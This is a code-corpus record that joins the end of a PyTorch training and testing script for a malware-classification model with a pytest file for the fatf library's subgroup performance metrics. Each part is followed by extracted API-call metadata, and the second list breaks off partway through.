logger.info("Save the last model into %s", output_model_file)
if eval_acc > best_acc:
not_acc_inc_cnt = 0
logger.info(" Best acc: %s", round(eval_acc, 4))
logger.info(" " + "*" * 20)
fa.write("[%d] Best acc changed into %.4f\n" % (cur_epoch, round(eval_acc, 4)))
best_acc = eval_acc
# Save best checkpoint for best ppl
output_dir = os.path.join(args.output_dir, 'checkpoint-best-acc')
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if args.data_num == -1 or True:
model_to_save = model.module if hasattr(model, 'module') else model
output_model_file = os.path.join(output_dir, "pytorch_model.bin")
torch.save(model_to_save.state_dict(), output_model_file)
logger.info("Save the best ppl model into %s", output_model_file)
else:
not_acc_inc_cnt += 1
logger.info("acc does not increase for %d epochs", not_acc_inc_cnt)
if not_acc_inc_cnt > args.patience:
logger.info("Early stop as acc do not increase for %d times", not_acc_inc_cnt)
fa.write("[%d] Early stop as not_acc_inc_cnt=%d\n" % (cur_epoch, not_acc_inc_cnt))
is_early_stop = True
break
model.train()
if is_early_stop:
break
logger.info("***** CUDA.empty_cache() *****")
torch.cuda.empty_cache()
if args.local_rank in [-1, 0] and args.data_num == -1:
tb_writer.close()
if args.do_test:
logger.info(" " + "***** Testing *****")
logger.info(" Batch size = %d", args.eval_batch_size)
for criteria in ['best-acc']:
file = os.path.join(args.output_dir, 'checkpoint-{}/pytorch_model.bin'.format(criteria))
logger.info("Reload model from {}".format(file))
model.load_state_dict(torch.load(file))
if args.n_gpu > 1:
# multi-gpu training
model = torch.nn.DataParallel(model)
eval_examples, eval_data = load_and_cache_malware_data(args, args.test_filename, pool, tokenizer, 'test',
False)
result = evaluate(args, model, eval_examples, eval_data, write_to_pred=True)
logger.info(" test_acc=%.4f", result['eval_acc'])
logger.info(" " + "*" * 20)
fa.write("[%s] test-acc: %.4f\n" % (criteria, result['eval_acc']))
if args.res_fn:
with open(args.res_fn, 'a+') as f:
f.write('[Time: {}] {}\n'.format(get_elapse_time(t0), file))
f.write("[%s] acc: %.4f\n\n" % (
criteria, result['eval_acc']))
fa.close()
if __name__ == "__main__":
main()
| [
"argparse.ArgumentParser",
"torch.utils.data.RandomSampler",
"configs.add_args",
"logging.getLogger",
"torch.cuda.device_count",
"numpy.mean",
"torch.device",
"torch.no_grad",
"os.path.join",
"multiprocessing.cpu_count",
"utils.load_and_cache_malware_data",
"torch.utils.data.DataLoader",
"to... | [((2212, 2239), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (2237, 2239), False, 'import multiprocessing\n'), ((2241, 2384), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)s - %(levelname)s - %(name)s - %(message)s"""', 'datefmt': '"""%m/%d/%Y %H:%M:%S"""', 'level': 'logging.INFO'}), "(format=\n '%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt=\n '%m/%d/%Y %H:%M:%S', level=logging.INFO)\n", (2260, 2384), False, 'import logging\n'), ((2424, 2451), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (2441, 2451), False, 'import logging\n'), ((2547, 2575), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['eval_data'], {}), '(eval_data)\n', (2564, 2575), False, 'from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset\n'), ((2598, 2674), 'torch.utils.data.DataLoader', 'DataLoader', (['eval_data'], {'sampler': 'eval_sampler', 'batch_size': 'args.eval_batch_size'}), '(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size)\n', (2608, 2674), False, 'from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset\n'), ((3438, 3463), 'numpy.concatenate', 'np.concatenate', (['logits', '(0)'], {}), '(logits, 0)\n', (3452, 3463), True, 'import numpy as np\n'), ((3477, 3502), 'numpy.concatenate', 'np.concatenate', (['labels', '(0)'], {}), '(labels, 0)\n', (3491, 3502), True, 'import numpy as np\n'), ((3549, 3573), 'numpy.mean', 'np.mean', (['(labels == preds)'], {}), '(labels == preds)\n', (3556, 3573), True, 'import numpy as np\n'), ((3633, 3656), 'torch.tensor', 'torch.tensor', (['eval_loss'], {}), '(eval_loss)\n', (3645, 3656), False, 'import torch\n'), ((4275, 4300), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (4298, 4300), False, 'import argparse\n'), ((4310, 4321), 'time.time', 'time.time', ([], {}), '()\n', (4319, 4321), False, 'import time\n'), ((4333, 4349), 'configs.add_args', 'add_args', (['parser'], {}), '(parser)\n', (4341, 4349), False, 'from configs import add_args, set_seed\n'), ((5121, 5135), 'configs.set_seed', 'set_seed', (['args'], {}), '(args)\n', (5129, 5135), False, 'from configs import add_args, set_seed\n'), ((5491, 5535), 'models.MalwareModel', 'MalwareModel', (['model', 'config', 'tokenizer', 'args'], {}), '(model, config, tokenizer, args)\n', (5503, 5535), False, 'from models import MalwareModel\n'), ((5850, 5880), 'multiprocessing.Pool', 'multiprocessing.Pool', (['cpu_cont'], {}), '(cpu_cont)\n', (5870, 5880), False, 'import multiprocessing\n'), ((5946, 6000), 'utils.get_filenames', 'get_filenames', (['args.data_dir', 'args.task', 'args.sub_task'], {}), '(args.data_dir, args.task, args.sub_task)\n', (5959, 6000), False, 'from utils import get_filenames, get_elapse_time, load_and_cache_malware_data\n'), ((4584, 4609), 'torch.cuda.device_count', 'torch.cuda.device_count', ([], {}), '()\n', (4607, 4609), False, 'import torch\n'), ((4715, 4753), 'torch.cuda.set_device', 'torch.cuda.set_device', (['args.local_rank'], {}), '(args.local_rank)\n', (4736, 4753), False, 'import torch\n'), ((4771, 4808), 'torch.device', 'torch.device', (['"""cuda"""', 'args.local_rank'], {}), "('cuda', args.local_rank)\n", (4783, 4808), False, 'import torch\n'), ((4817, 4869), 'torch.distributed.init_process_group', 'torch.distributed.init_process_group', ([], {'backend': '"""nccl"""'}), "(backend='nccl')\n", (4853, 4869), False, 'import torch\n'), ((5589, 5610), 'models.get_model_size', 'get_model_size', (['model'], {}), '(model)\n', (5603, 5610), False, 'from models import get_model_size\n'), ((6015, 6059), 'os.path.join', 'os.path.join', (['args.output_dir', '"""summary.log"""'], {}), "(args.output_dir, 'summary.log')\n", (6027, 6059), False, 'import os\n'), ((6489, 6590), 'utils.load_and_cache_malware_data', 'load_and_cache_malware_data', (['args', 'args.train_filename', 'pool', 'tokenizer', '"""train"""'], {'is_sample': '(False)'}), "(args, args.train_filename, pool, tokenizer,\n 'train', is_sample=False)\n", (6516, 6590), False, 'from utils import get_filenames, get_elapse_time, load_and_cache_malware_data\n'), ((6839, 6918), 'torch.utils.data.DataLoader', 'DataLoader', (['train_data'], {'sampler': 'train_sampler', 'batch_size': 'args.train_batch_size'}), '(train_data, sampler=train_sampler, batch_size=args.train_batch_size)\n', (6849, 6918), False, 'from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset\n'), ((7517, 7603), 'transformers.AdamW', 'AdamW', (['optimizer_grouped_parameters'], {'lr': 'args.learning_rate', 'eps': 'args.adam_epsilon'}), '(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.\n adam_epsilon)\n', (7522, 7603), False, 'from transformers import WEIGHTS_NAME, AdamW, get_linear_schedule_with_warmup, RobertaConfig, RobertaModel, RobertaTokenizer, BartConfig, BartForConditionalGeneration, BartTokenizer, T5Config, T5ForConditionalGeneration, T5Tokenizer\n'), ((7794, 7920), 'transformers.get_linear_schedule_with_warmup', 'get_linear_schedule_with_warmup', (['optimizer'], {'num_warmup_steps': 'warmup_steps', 'num_training_steps': 'num_train_optimization_steps'}), '(optimizer, num_warmup_steps=warmup_steps,\n num_training_steps=num_train_optimization_steps)\n', (7825, 7920), False, 'from transformers import WEIGHTS_NAME, AdamW, get_linear_schedule_with_warmup, RobertaConfig, RobertaModel, RobertaTokenizer, BartConfig, BartForConditionalGeneration, BartTokenizer, T5Config, T5ForConditionalGeneration, T5Tokenizer\n'), ((3190, 3205), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3203, 3205), False, 'import torch\n'), ((5782, 5814), 'torch.load', 'torch.load', (['args.load_model_path'], {}), '(args.load_model_path)\n', (5792, 5814), False, 'import torch\n'), ((6170, 6198), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {}), '(model)\n', (6191, 6198), False, 'import torch\n'), ((6386, 6411), 'torch.utils.tensorboard.SummaryWriter', 'SummaryWriter', (['summary_fn'], {}), '(summary_fn)\n', (6399, 6411), False, 'from torch.utils.tensorboard import SummaryWriter\n'), ((6713, 6738), 'torch.utils.data.RandomSampler', 'RandomSampler', (['train_data'], {}), '(train_data)\n', (6726, 6738), False, 'from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset\n'), ((6781, 6811), 'torch.utils.data.distributed.DistributedSampler', 'DistributedSampler', (['train_data'], {}), '(train_data)\n', (6799, 6811), False, 'from torch.utils.data.distributed import DistributedSampler\n'), ((8257, 8309), 'math.ceil', 'math.ceil', (['(train_example_num / args.train_batch_size)'], {}), '(train_example_num / args.train_batch_size)\n', (8266, 8309), False, 'import math\n'), ((12942, 12966), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (12964, 12966), False, 'import torch\n'), ((13611, 13700), 'utils.load_and_cache_malware_data', 'load_and_cache_malware_data', (['args', 'args.test_filename', 'pool', 'tokenizer', '"""test"""', '(False)'], {}), "(args, args.test_filename, pool, tokenizer,\n 'test', False)\n", (13638, 13700), False, 'from utils import get_filenames, get_elapse_time, load_and_cache_malware_data\n'), ((3949, 3997), 'os.path.join', 'os.path.join', (['args.output_dir', '"""predictions.txt"""'], {}), "(args.output_dir, 'predictions.txt')\n", (3961, 3997), False, 'import os\n'), ((13431, 13447), 'torch.load', 'torch.load', (['file'], {}), '(file)\n', (13441, 13447), False, 'import torch\n'), ((13542, 13570), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {}), '(model)\n', (13563, 13570), False, 'import torch\n'), ((4504, 4529), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (4527, 4529), False, 'import torch\n'), ((10027, 10051), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (10049, 10051), False, 'import torch\n'), ((10100, 10199), 'utils.load_and_cache_malware_data', 'load_and_cache_malware_data', (['args', 'args.dev_filename', 'pool', 'tokenizer', '"""valid"""'], {'is_sample': '(False)'}), "(args, args.dev_filename, pool, tokenizer,\n 'valid', is_sample=False)\n", (10127, 10199), False, 'from utils import get_filenames, get_elapse_time, load_and_cache_malware_data\n'), ((10612, 10660), 'os.path.join', 'os.path.join', (['args.output_dir', '"""checkpoint-last"""'], {}), "(args.output_dir, 'checkpoint-last')\n", (10624, 10660), False, 'import os\n'), ((14086, 14109), 'io.open', 'open', (['args.res_fn', '"""a+"""'], {}), "(args.res_fn, 'a+')\n", (14090, 14109), False, 'from io import open\n'), ((10688, 10719), 'os.path.exists', 'os.path.exists', (['last_output_dir'], {}), '(last_output_dir)\n', (10702, 10719), False, 'import os\n'), ((10745, 10773), 'os.makedirs', 'os.makedirs', (['last_output_dir'], {}), '(last_output_dir)\n', (10756, 10773), False, 'import os\n'), ((10994, 11044), 'os.path.join', 'os.path.join', (['last_output_dir', '"""pytorch_model.bin"""'], {}), "(last_output_dir, 'pytorch_model.bin')\n", (11006, 11044), False, 'import os\n'), ((11674, 11726), 'os.path.join', 'os.path.join', (['args.output_dir', '"""checkpoint-best-acc"""'], {}), "(args.output_dir, 'checkpoint-best-acc')\n", (11686, 11726), False, 'import os\n'), ((11758, 11784), 'os.path.exists', 'os.path.exists', (['output_dir'], {}), '(output_dir)\n', (11772, 11784), False, 'import os\n'), ((11814, 11837), 'os.makedirs', 'os.makedirs', (['output_dir'], {}), '(output_dir)\n', (11825, 11837), False, 'import os\n'), ((12038, 12083), 'os.path.join', 'os.path.join', (['output_dir', '"""pytorch_model.bin"""'], {}), "(output_dir, 'pytorch_model.bin')\n", (12050, 12083), False, 'import os\n'), ((14169, 14188), 'utils.get_elapse_time', 'get_elapse_time', (['t0'], {}), '(t0)\n', (14184, 14188), False, 'from utils import get_filenames, get_elapse_time, load_and_cache_malware_data\n')] |
"""
Tests implementations of sub-population model metrics and tools.
"""
# Author: <NAME> <<EMAIL>>
# License: new BSD
import pytest
import numpy as np
import fatf.utils.metrics.subgroup_metrics as fums
MISSING_LABEL_WARNING = ('Some of the given labels are not present in either '
'of the input arrays: {2}.')
DATASET = np.array([['0', '3', '0'], ['0', '5', '0'], ['0', '7', '0'],
['0', '5', '0'], ['0', '7', '0'], ['0', '3', '0'],
['0', '5', '0'], ['0', '3', '0'], ['0', '7', '0'],
['0', '5', '0'], ['0', '7', '0'], ['0', '7', '0'],
['0', '5', '0'], ['0', '7', '0'], ['0', '7', '0']])
_INDICES_PER_BIN = [[0, 5, 7], [1, 6, 9, 3, 12], [2, 4, 8, 10, 11, 13, 14]]
GROUND_TRUTH = np.zeros((15, ), dtype=int)
GROUND_TRUTH[_INDICES_PER_BIN[0]] = [0, 1, 0]
GROUND_TRUTH[_INDICES_PER_BIN[1]] = [0, 1, 2, 1, 0]
GROUND_TRUTH[_INDICES_PER_BIN[2]] = [0, 1, 2, 0, 1, 2, 0]
PREDICTIONS = np.zeros((15, ), dtype=int)
PREDICTIONS[_INDICES_PER_BIN[0]] = [0, 0, 0]
PREDICTIONS[_INDICES_PER_BIN[1]] = [0, 2, 2, 2, 0]
PREDICTIONS[_INDICES_PER_BIN[2]] = [0, 1, 2, 2, 1, 0, 0]
def test_apply_metric_function():
"""
Tests :func:`fatf.utils.metrics.subgroup_metrics.apply_metric_function`.
"""
type_error_cmxs = ('The population_confusion_matrix parameter has to be a '
'list.')
value_error_cmxs = ('The population_confusion_matrix parameter cannot be '
'an empty list.')
#
type_error_fn = ('The metric_function parameter has to be a Python '
'callable.')
attribute_error_fn = ('The metric_function callable needs to have at '
'least one required parameter taking a confusion '
'matrix. 0 were found.')
#
type_error_metric = ('One of the metric function outputs is not a number: '
'*{}*.')
def zero():
return 'zero' # pragma: nocover
def one(one):
return 0.5
def one_array(one):
return one.sum()
def two(one, two):
return 'one' + '+' + 'two' + ' : ' + two
cfmx = np.array([[1, 2], [2, 1]])
with pytest.raises(TypeError) as exin:
fums.apply_metric_function('a', None)
assert str(exin.value) == type_error_cmxs
with pytest.raises(ValueError) as exin:
fums.apply_metric_function([], None)
assert str(exin.value) == value_error_cmxs
with pytest.raises(TypeError) as exin:
fums.apply_metric_function([cfmx], None)
assert str(exin.value) == type_error_fn
with pytest.raises(AttributeError) as exin:
fums.apply_metric_function([cfmx], zero)
assert str(exin.value) == attribute_error_fn
with pytest.raises(TypeError) as exin:
fums.apply_metric_function([cfmx], two, 'second_arg')
assert str(exin.value) == type_error_metric.format('one+two : second_arg')
measures = fums.apply_metric_function([cfmx], one)
assert measures == [0.5]
measures = fums.apply_metric_function([cfmx], one_array)
assert measures == [6]
def test_apply_metric():
"""
Tests :func:`fatf.utils.metrics.subgroup_metrics.apply_metric` function.
"""
type_error = 'The metric parameter has to be a string.'
value_error = ('The selected metric (*{}*) is not recognised. The '
'following options are available: {}.')
available_metrics = [
'true positive rate', 'true negative rate', 'false positive rate',
'false negative rate', 'positive predictive value', 'accuracy',
'treatment', 'negative predictive value'
]
cfmx = np.array([[1, 2], [3, 4]])
with pytest.raises(TypeError) as exin:
fums.apply_metric([cfmx], 5)
assert str(exin.value) == type_error
with pytest.raises(ValueError) as exin:
fums.apply_metric([cfmx], 'unknown_metric')
assert str(exin.value) == value_error.format('unknown_metric',
sorted(available_metrics))
measures = fums.apply_metric([cfmx])
assert len(measures) == 1
assert measures[0] == 0.5
measures = fums.apply_metric([cfmx], 'true positive rate')
assert len(measures) == 1
assert measures[0] == 0.25
measures = fums.apply_metric([cfmx], 'true positive rate', label_index=1)
assert len(measures) == 1
assert measures[0] == pytest.approx(0.667, abs=1e-3)
def test_performance_per_subgroup():
"""
Tests :func:`fatf.utils.metrics.subgroup_metrics.performance_per_subgroup`.
"""
true_bin_names = ["('3',)", "('5',)", "('7',)"]
# Default metric
with pytest.warns(UserWarning) as w:
bin_metrics, bin_names = fums.performance_per_subgroup(
DATASET, GROUND_TRUTH, PREDICTIONS, 1)
assert len(w) == 1
assert str(w[0].message) == MISSING_LABEL_WARNING
#
assert bin_metrics == pytest.approx([2 / 3, 3 / 5, 5 / 7], abs=1e-3)
assert bin_names == true_bin_names
# Named metric
with pytest.warns(UserWarning) as w:
bin_metrics, bin_names = fums.performance_per_subgroup(
DATASET, GROUND_TRUTH, PREDICTIONS, 1, metric='true positive rate')
assert len(w) == 1
assert str(w[0].message) == MISSING_LABEL_WARNING
#
assert bin_metrics == pytest.approx([1, 1, 2 / 3], abs=1e-3)
assert bin_names == true_bin_names
# Named metric with **kwargs
with pytest.warns(UserWarning) as w:
bin_metrics, bin_names = fums.performance_per_subgroup(
DATASET,
GROUND_TRUTH,
PREDICTIONS,
1,
metric='true negative rate',
strict=True)
assert len(w) == 1
assert str(w[0].message) == MISSING_LABEL_WARNING
#
assert bin_metrics == pytest.approx([0, 1 / 3, 3 / 4], abs=1e-3)
assert bin_names == true_bin_names
def one(one):
return one.sum()
def two(one, two, three=0):
return one.sum() + two + three
# Function metric -- takes the precedence
with pytest.warns(UserWarning) as w:
bin_metrics, bin_names = fums.performance_per_subgroup(
DATASET,
GROUND_TRUTH,
PREDICTIONS,
1,
metric='true negative rate',
metric_function=one)
assert len(w) == 1
assert str(w[0].message) == MISSING_LABEL_WARNING
#
assert bin_metrics == [3, 5, 7]
assert bin_names == true_bin_names
# Function metric with *args
with pytest.warns(UserWarning) as w:
bin_metrics, bin_names = fums.performance_per_subgroup(
DATASET,
GROUND_TRUTH,
PREDICTIONS,
1,
3,
metric='true negative rate',
metric_function=two)
assert len(w) == 1
assert str(w[0].message) == MISSING_LABEL_WARNING
#
assert bin_metrics == [6, 8, 10]
assert bin_names == true_bin_names
# Function metric with *args and **kwargs
with pytest.warns(UserWarning) as w:
bin_metrics, bin_names = fums.performance_per_subgroup(
DATASET,
GROUND_TRUTH,
PREDICTIONS,
1,
3,
metric='true negative rate',
metric_function=two,
three=-6)
assert len(w) == 1
assert str(w[0].message) == MISSING_LABEL_WARNING
#
assert bin_metrics == [0, 2, 4]
assert bin_names == true_bin_names
def test_performance_per_subgroup_indexed():
"""
Tests calculating performance per indexed sub-group.
Tests :func:`fatf.utils.metrics.subgroup_metrics.
performance_per_subgroup_indexed` function.
"""
# Default metric
with pytest.warns(UserWarning) as w:
bin_metrics = fums.performance_per_subgroup_indexed(
_INDICES_PER_BIN, GROUND_TRUTH, PREDICTIONS, labels=[0, 1, 2])
assert len(w) == 1
assert str(w[0].message) == MISSING_LABEL_WARNING
#
assert bin_metrics == pytest.approx([2 / 3, 3 / 5, 5 / 7], abs=1e-3)
# Named metric
with pytest.warns(UserWarning) as w:
bin_metrics = fums.performance_per_subgroup_indexed(
_INDICES_PER_BIN,
GROUND_TRUTH,
PREDICTIONS,
labels=[0, 1, 2],
metric='true positive rate')
assert len(w) == 1
assert str(w[0].message) == MISSING_LABEL_WARNING
#
assert bin_metrics == pytest.approx([1, 1, 2 / 3], abs=1e-3)
# Named metric with **kwargs
with pytest.warns(UserWarning) as w:
bin_metrics = fums.performance_per_subgroup_indexed(
_INDICES_PER_BIN,
GROUND_TRUTH,
PREDICTIONS,
labels=[0, 1, 2],
metric='true negative rate',
strict=True)
assert len(w) == 1
assert str(w[0].message) == MISSING_LABEL_WARNING
#
assert bin_metrics == pytest.approx([0, 1 / 3, 3 / 4], abs=1e-3)
def one(one):
return one.sum()
def two(one, two, three=0):
return one.sum() + two + three
# Function metric -- takes the precedence
with pytest.warns(UserWarning) as w:
bin_metrics = fums.performance_per_subgroup_indexed(
_INDICES_PER_BIN,
GROUND_TRUTH,
PREDICTIONS,
labels=[0, 1, 2],
metric='true negative rate',
metric_function=one)
assert len(w) == 1
assert str(w[0].message) == MISSING_LABEL_WARNING
#
assert bin_metrics == [3, 5, 7]
# Function metric with *args
with pytest.warns(UserWarning) as w:
bin_metrics = fums.performance_per_subgroup_indexed(
_INDICES_PER_BIN,
GROUND_TRUTH,
PREDICTIONS,
3,
labels=[0, 1, 2],
metric='true negative rate',
metric_function=two)
assert len(w) == 1
assert str(w[0].message) == MISSING_LABEL_WARNING
#
assert bin_metrics == [6, 8, 10]
# Function metric with *args and **kwargs
with pytest.warns(UserWarning) as w:
bin_metrics = fums.performance_per_subgroup_indexed(
_INDICES_PER_BIN,
GROUND_TRUTH,
PREDICTIONS,
3,
labels=[0, 1, 2],
metric='true negative rate',
metric_function=two,
three=-6)
assert len(w) == 1
assert str(w[0].message) == MISSING_LABEL_WARNING
#
assert bin_metrics == [0, 2, 4]
| [
"fatf.utils.metrics.subgroup_metrics.apply_metric",
"fatf.utils.metrics.subgroup_metrics.performance_per_subgroup_indexed",
"pytest.warns",
"fatf.utils.metrics.subgroup_metrics.performance_per_subgroup",
"numpy.zeros",
"pytest.raises",
"numpy.array",
"pytest.approx",
"fatf.utils.metrics.subgroup_met... | [((351, 630), 'numpy.array', 'np.array', (["[['0', '3', '0'], ['0', '5', '0'], ['0', '7', '0'], ['0', '5', '0'], ['0',\n '7', '0'], ['0', '3', '0'], ['0', '5', '0'], ['0', '3', '0'], ['0', '7',\n '0'], ['0', '5', '0'], ['0', '7', '0'], ['0', '7', '0'], ['0', '5', '0'\n ], ['0', '7', '0'], ['0', '7', '0']]"], {}), "([['0', '3', '0'], ['0', '5', '0'], ['0', '7', '0'], ['0', '5', '0'\n ], ['0', '7', '0'], ['0', '3', '0'], ['0', '5', '0'], ['0', '3', '0'],\n ['0', '7', '0'], ['0', '5', '0'], ['0', '7', '0'], ['0', '7', '0'], [\n '0', '5', '0'], ['0', '7', '0'], ['0', '7', '0']])\n", (359, 630), True, 'import numpy as np\n'), ((788, 814), 'numpy.zeros', 'np.zeros', (['(15,)'], {'dtype': 'int'}), '((15,), dtype=int)\n', (796, 814), True, 'import numpy as np\n'), ((986, 1012), 'numpy.zeros', 'np.zeros', (['(15,)'], {'dtype': 'int'}), '((15,), dtype=int)\n', (994, 1012), True, 'import numpy as np\n'), ((2196, 2222), 'numpy.array', 'np.array', (['[[1, 2], [2, 1]]'], {}), '([[1, 2], [2, 1]])\n', (2204, 2222), True, 'import numpy as np\n'), ((2981, 3020), 'fatf.utils.metrics.subgroup_metrics.apply_metric_function', 'fums.apply_metric_function', (['[cfmx]', 'one'], {}), '([cfmx], one)\n', (3007, 3020), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((3066, 3111), 'fatf.utils.metrics.subgroup_metrics.apply_metric_function', 'fums.apply_metric_function', (['[cfmx]', 'one_array'], {}), '([cfmx], one_array)\n', (3092, 3111), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((3691, 3717), 'numpy.array', 'np.array', (['[[1, 2], [3, 4]]'], {}), '([[1, 2], [3, 4]])\n', (3699, 3717), True, 'import numpy as np\n'), ((4096, 4121), 'fatf.utils.metrics.subgroup_metrics.apply_metric', 'fums.apply_metric', (['[cfmx]'], {}), '([cfmx])\n', (4113, 4121), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((4198, 4245), 'fatf.utils.metrics.subgroup_metrics.apply_metric', 'fums.apply_metric', (['[cfmx]', '"""true positive rate"""'], {}), "([cfmx], 'true positive rate')\n", (4215, 4245), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((4323, 4385), 'fatf.utils.metrics.subgroup_metrics.apply_metric', 'fums.apply_metric', (['[cfmx]', '"""true positive rate"""'], {'label_index': '(1)'}), "([cfmx], 'true positive rate', label_index=1)\n", (4340, 4385), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((2233, 2257), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (2246, 2257), False, 'import pytest\n'), ((2275, 2312), 'fatf.utils.metrics.subgroup_metrics.apply_metric_function', 'fums.apply_metric_function', (['"""a"""', 'None'], {}), "('a', None)\n", (2301, 2312), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((2369, 2394), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2382, 2394), False, 'import pytest\n'), ((2412, 2448), 'fatf.utils.metrics.subgroup_metrics.apply_metric_function', 'fums.apply_metric_function', (['[]', 'None'], {}), '([], None)\n', (2438, 2448), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((2506, 2530), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (2519, 2530), False, 'import pytest\n'), ((2548, 2588), 'fatf.utils.metrics.subgroup_metrics.apply_metric_function', 'fums.apply_metric_function', (['[cfmx]', 'None'], {}), '([cfmx], None)\n', (2574, 2588), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((2643, 2672), 'pytest.raises', 'pytest.raises', (['AttributeError'], {}), '(AttributeError)\n', (2656, 2672), False, 'import pytest\n'), ((2690, 2730), 'fatf.utils.metrics.subgroup_metrics.apply_metric_function', 'fums.apply_metric_function', (['[cfmx]', 'zero'], {}), '([cfmx], zero)\n', (2716, 2730), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((2790, 2814), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (2803, 2814), False, 'import pytest\n'), ((2832, 2885), 'fatf.utils.metrics.subgroup_metrics.apply_metric_function', 'fums.apply_metric_function', (['[cfmx]', 'two', '"""second_arg"""'], {}), "([cfmx], two, 'second_arg')\n", (2858, 2885), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((3728, 3752), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (3741, 3752), False, 'import pytest\n'), ((3770, 3798), 'fatf.utils.metrics.subgroup_metrics.apply_metric', 'fums.apply_metric', (['[cfmx]', '(5)'], {}), '([cfmx], 5)\n', (3787, 3798), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((3850, 3875), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (3863, 3875), False, 'import pytest\n'), ((3893, 3936), 'fatf.utils.metrics.subgroup_metrics.apply_metric', 'fums.apply_metric', (['[cfmx]', '"""unknown_metric"""'], {}), "([cfmx], 'unknown_metric')\n", (3910, 3936), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((4442, 4473), 'pytest.approx', 'pytest.approx', (['(0.667)'], {'abs': '(0.001)'}), '(0.667, abs=0.001)\n', (4455, 4473), False, 'import pytest\n'), ((4691, 4716), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (4703, 4716), False, 'import pytest\n'), ((4756, 4824), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup', 'fums.performance_per_subgroup', (['DATASET', 'GROUND_TRUTH', 'PREDICTIONS', '(1)'], {}), '(DATASET, GROUND_TRUTH, PREDICTIONS, 1)\n', (4785, 4824), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((4947, 4994), 'pytest.approx', 'pytest.approx', (['[2 / 3, 3 / 5, 5 / 7]'], {'abs': '(0.001)'}), '([2 / 3, 3 / 5, 5 / 7], abs=0.001)\n', (4960, 4994), False, 'import pytest\n'), ((5062, 5087), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (5074, 5087), False, 'import pytest\n'), ((5127, 5229), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup', 'fums.performance_per_subgroup', (['DATASET', 'GROUND_TRUTH', 'PREDICTIONS', '(1)'], {'metric': '"""true positive rate"""'}), "(DATASET, GROUND_TRUTH, PREDICTIONS, 1, metric\n ='true positive rate')\n", (5156, 5229), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((5347, 5386), 'pytest.approx', 'pytest.approx', (['[1, 1, 2 / 3]'], {'abs': '(0.001)'}), '([1, 1, 2 / 3], abs=0.001)\n', (5360, 5386), False, 'import pytest\n'), ((5468, 5493), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (5480, 5493), False, 'import pytest\n'), ((5533, 5648), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup', 'fums.performance_per_subgroup', (['DATASET', 'GROUND_TRUTH', 'PREDICTIONS', '(1)'], {'metric': '"""true negative rate"""', 'strict': '(True)'}), "(DATASET, GROUND_TRUTH, PREDICTIONS, 1, metric\n ='true negative rate', strict=True)\n", (5562, 5648), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((5826, 5869), 'pytest.approx', 'pytest.approx', (['[0, 1 / 3, 3 / 4]'], {'abs': '(0.001)'}), '([0, 1 / 3, 3 / 4], abs=0.001)\n', (5839, 5869), False, 'import pytest\n'), ((6080, 6105), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (6092, 6105), False, 'import pytest\n'), ((6145, 6268), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup', 'fums.performance_per_subgroup', (['DATASET', 'GROUND_TRUTH', 'PREDICTIONS', '(1)'], {'metric': '"""true negative rate"""', 'metric_function': 'one'}), "(DATASET, GROUND_TRUTH, PREDICTIONS, 1, metric\n ='true negative rate', metric_function=one)\n", (6174, 6268), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((6538, 6563), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (6550, 6563), False, 'import pytest\n'), ((6603, 6728), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup', 'fums.performance_per_subgroup', (['DATASET', 'GROUND_TRUTH', 'PREDICTIONS', '(1)', 